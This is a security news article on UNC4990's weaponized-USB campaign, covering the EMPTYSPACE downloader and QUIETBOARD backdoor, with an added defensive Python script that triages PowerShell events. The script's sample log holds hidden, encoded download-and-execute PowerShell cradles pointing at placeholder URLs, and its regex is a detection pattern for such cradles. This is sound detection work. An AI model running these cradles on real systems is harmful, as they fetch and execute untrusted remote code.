☠️ Plug it in, get hacked!
A financially motivated threat actor known as UNC4990 is leveraging weaponized USB devices as the initial infection vector to target organizations in Italy.
Google-owned Mandiant said the attacks targeted many industries, including healthcare, transportation, construction and logistics.
“UNC4990 operations typically involve widespread USB infection followed by distribution of the EMPTYSPACE downloader,” the company said in a report published Tuesday.
“During these operations, the cluster relies on third-party websites such as GitHub, Vimeo, and Ars Technica to host additional encoded stages that it downloads and decodes via PowerShell early in the execution chain.”
Active since late 2020, UNC4990 is assessed to operate out of Italy and relies extensively on Italian infrastructure for command-and-control (C2).
It is currently unknown whether UNC4990 functions solely as an initial access facilitator for other actors. The threat actor's ultimate goal is also unclear, but in one instance an open-source cryptocurrency miner is said to have been deployed after months of beacon activity.
Details of the campaign were previously documented by Fortgale and Yoroi in early December 2023; the former tracks the adversary under the name Nebula Broker.
The infection begins when the victim double-clicks a malicious LNK shortcut file on a removable USB device. This runs a PowerShell script that downloads EMPTYSPACE (aka BrokerLoader or Vetta Loader) from a remote server by way of a second, intermediate PowerShell script hosted on Vimeo.
Yoroi said it identified four different variants of EMPTYSPACE written in Golang, .NET, Node.js, and Python. The downloader then acts as a conduit for receiving next-stage payloads over HTTP from the C2 server, including a backdoor called QUIETBOARD.
A notable aspect of this phase is the use of popular sites such as Ars Technica, GitHub, GitLab, and Vimeo to host the malicious payload.
“The content hosted on these services did not pose a direct risk to everyday users of these services, as the content hosted on its own was completely harmless,” Mandiant researchers said. “Anyone who may have accidentally clicked on or viewed this content in the past was not at risk of being compromised.”
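The stage described above (a double-clicked LNK on a removable drive, a PowerShell download cradle, and an encoded stage pulled from a legitimate third-party site) shows up on an endpoint as a single process-creation event. The following is an added example of how a responder might triage such events; it is not Mandiant, Fortgale or Yoroi tooling and is not taken from the report. It assumes Sysmon-style Event ID 1 fields (Image, ParentImage, CommandLine, CurrentDirectory) flattened to JSON, treats any drive other than C: as removable (a simplification), and the log lines and placeholder URLs (vimeo.com/EXAMPLE, github.com/EXAMPLE) are constructed for the example, not indicators from the campaign.

```python
"""Triage PowerShell process-creation events for the USB/LNK -> dead-drop pattern.

Added example, not vendor tooling. Field names follow Sysmon Event ID 1;
the sample records below are constructed, not real telemetry.
"""
import base64
import json
import re

# Legitimate third-party services the report names as hosts for encoded stages.
STAGE_HOSTS = ("vimeo.com", "github.com", "gitlab.com", "arstechnica.com")

# Common PowerShell download cradles plus the decode call used to unpack a stage.
CRADLE_RE = re.compile(
    r"(DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b|"
    r"Invoke-RestMethod|\birm\b|Net\.WebClient|FromBase64String)",
    re.IGNORECASE,
)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
SYSTEM_DRIVE = "C:"  # assumption: any other drive letter is treated as removable


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if there is none.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...),
    so the flag is matched by prefix rather than by exact spelling.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if tok[0] in "-/" and flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return ""
    return ""


def hosts_in(text: str) -> set:
    """Stage hosts referenced by URL in text, matching subdomains by suffix."""
    found = set()
    for host in HOST_RE.findall(text):
        host = host.lower()
        for known in STAGE_HOSTS:
            if host == known or host.endswith("." + known):
                found.add(known)
    return found


def triage(event: dict) -> dict:
    """Score one process-creation event and return the indicators that fired."""
    indicators, decoded = [], ""
    if not event.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return {"suspicious": False, "indicators": indicators, "decoded": decoded}

    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    if decoded:
        indicators.append("encoded_command")
    visible = cmdline + "\n" + decoded  # inspect the decoded script too

    if event.get("ParentImage", "").lower().endswith("explorer.exe"):
        indicators.append("spawned_by_explorer")  # what a double-clicked LNK looks like
    cwd = event.get("CurrentDirectory", "")
    if cwd and not cwd.upper().startswith(SYSTEM_DRIVE):
        indicators.append("non_system_drive:" + cwd[:2])
    if CRADLE_RE.search(visible):
        indicators.append("download_cradle")
    for host in sorted(hosts_in(visible)):
        indicators.append("stage_host:" + host)

    # A cradle pulling from a known stage host is enough on its own; otherwise
    # require several weaker signals to keep routine admin PowerShell quiet.
    chain = "download_cradle" in indicators and any(i.startswith("stage_host:") for i in indicators)
    return {"suspicious": chain or len(indicators) >= 3, "indicators": indicators, "decoded": decoded}


def run(lines):
    """Parse JSON log lines and triage each one."""
    return [triage(json.loads(line)) for line in lines]


# Constructed Sysmon-style records: an LNK-launched encoded cradle from a USB drive,
# a benign admin script, and a plaintext cradle pulling from GitHub.
SAMPLE_LOG = [
    json.dumps({
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CurrentDirectory": "E:\\",
        "CommandLine": "powershell.exe -w hidden -nop -ep bypass -enc " + encode_command(
            "IEX (New-Object Net.WebClient).DownloadString('https://vimeo.com/EXAMPLE')"),
    }),
    json.dumps({
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CurrentDirectory": r"C:\Users\alice\Documents",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    }),
    json.dumps({
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CurrentDirectory": r"C:\Users\alice",
        "CommandLine": 'powershell -nop -w hidden -c "iwr https://github.com/EXAMPLE/raw | iex"',
    }),
]

if __name__ == "__main__":
    for result in run(SAMPLE_LOG):
        print(result["suspicious"], result["indicators"])
```

Decoding -EncodedCommand before matching matters: the hosts and the cradle are only visible inside the UTF-16LE payload. Expect false positives from the third record's rule (administrators do pipe GitHub-hosted installers into `iex`), so treat a hit as a lead to pivot on (parent process, drive type, the fetched content) rather than as a verdict.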
QUIETBOARD, for its part, is a Python-based backdoor with a wide range of features: it can execute arbitrary commands, swap cryptocurrency wallet addresses copied to the clipboard so that fund transfers are routed to attacker-controlled wallets, propagate the malware to removable drives, take screenshots, and collect system information.
Additionally, the backdoor can dynamically fetch and run Python code from the C2 server, as well as run standalone Python modules such as extensions and coin miners.
“The analysis of both EMPTYSPACE and QUIETBOARD demonstrates how threat actors are taking a modular approach when developing their toolkits,” Mandiant said.
“The use of multiple programming languages to create different versions of the EMPTYSPACE downloader, and the change of URL when the Vimeo video was taken down, demonstrate a trend towards experimentation and adaptability on the part of the threat actors.”